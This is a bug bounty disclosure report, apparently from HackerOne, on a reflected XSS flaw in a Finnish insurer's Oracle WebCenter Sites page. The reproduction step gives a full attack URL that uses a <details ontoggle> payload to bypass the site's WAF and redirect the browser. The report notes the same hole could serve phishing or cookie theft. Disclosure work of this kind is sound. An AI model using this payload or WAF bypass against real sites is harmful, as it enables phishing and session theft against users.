LocalTapiola: Reflected XSS Vulnerability in https://www.lahitapiola.fi/cs/Satellite

2018-01-01T20:16:24
ID H1:301680
Type hackerone
Reporter teemuk
Modified 2018-04-11T06:34:46

Description

Basic report information

Summary: Reflected XSS vulnerability in https://www.lahitapiola.fi/cs/Satellite.

Description: There exists a reflected XSS vulnerability in https://www.lahitapiola.fi/cs/Satellite?pagename=TAMaster/FW_BlogAsset/FW_Nav. Value of query string parameter rendermode is not properly escaped when it is output to the page. The web-application-firewall (WAF) seems to mitigate majority of the simplest XSS vectors, but it is possible to bypass the WAF by using onToggle event in <details> HTML element. The javascript that is used to demonstrate the vulnerability is location.href="https://www.google.com/?q="+document.domain. This demonstrates an open redirect type of vulnerability where user's browser is redirected to the attacker page where the attacker can e.g. perform phishing.

Domain: www.lahitapiola.fi

Browsers / Apps Verified In:

  • Firefox version 57.0.3

Steps To Reproduce:

Access the attack URL https://www.lahitapiola.fi/cs/Satellite?pagename=TAMaster/FW_BlogAsset/FW_Nav&rendermode=preview"><details%20open=true%20ontoggle=%27location.href="https://www.google.com/?q="%2Bdocument.domain%27><summary>testing</summary></details> Browser is redirected to https://www.google.com/?q=www.lahitapiola.fi.

Additional material

  • N/A

Related reports, best practices

This vulnerability is related to the previously reported Oracle Webcenter Sites vulnerabilities (e.g. #170532)

Impact

An attacker can use reflected XSS vulnerabilities to inject content to pages served from www.lahitapiola.fi. This can be used e.g. for phishing purposes or to e.g. steal cookies from user's browser.